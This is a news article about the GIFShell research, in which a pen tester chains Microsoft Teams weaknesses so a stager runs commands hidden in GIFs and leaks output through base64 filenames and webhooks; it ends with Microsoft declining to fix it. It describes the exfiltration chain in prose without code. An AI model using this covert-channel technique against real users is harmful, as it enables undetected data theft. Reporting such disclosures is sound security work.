Microsoft Teams users can currently share GIF files to more accurately describe their emotions to their colleagues, but experts have warned that cybercriminals could also use them to execute malicious commands and steal sensitive data without being detected by antivirus programs (opens in new tab) tools.
Cybersecurity consultant and pen tester Bobby Rauch discovered a number of vulnerabilities in the video conferencing platform that, when linked together, could lead to data exfiltration and malicious code execution.
It’s also quite an undertaking as the attacker has to do a number of things including getting the victim to first download and install a malicious stager capable of executing commands and command output via GIF urls to Microsoft Teams- upload webhooks. The stager scans Microsoft Teams (opens in new tab) logs that allegedly store all received messages and are readable by all Windows user groups, regardless of their privilege levels.
Using the stager
After setting up the stager, the attacker must create a new Teams tenant and contact other Teams members outside the organization. According to the researcher, this is not much of a challenge, since Microsoft allows external communication by default. Then, using the researcher’s Python script called GIFShell, the attacker can send a malicious .GIF file capable of executing commands on the target endpoint.
Both the message and the .GIF file end up in the logs folder under the watchful eye of the stager. This tool then extracts the commands from the .GIF and executes them on the device. The GIFShell PoC can then take the output and convert it to base64 text, and use that as the filename for an external .GIF embedded in a Microsoft Teams survey card. The stager then submits that card to the attacker’s public Microsoft Teams webhook. Then Microsoft’s servers will reconnect to the attacker’s server URL to retrieve the .GIF. GIFShell then receives the request and decrypts the filename, giving the threat actor a clear view of the output of the command being executed on the target endpoint (opens in new tab).
The researcher also added that nothing prevents attackers from sending as many GIFs as they want, each with different malicious commands. In addition, since the traffic apparently comes from Microsoft’s own servers, it is considered legitimate and unmarked by cybersecurity tools.
When notified of the findings, Microsoft said it would not address them, as they do not necessarily circumvent security boundaries.
“For this case 72412, although this is great research and the engineering team will try to improve these areas over time, these are all post-exploitation and rely on a target that has already been compromised,” Microsoft apparently told. to Rauch.
“There does not appear to be a security boundary being crossed. The product team will review the issue for possible future design changes, but the security team will not monitor this.”
Through: BleepingComputer (opens in new tab)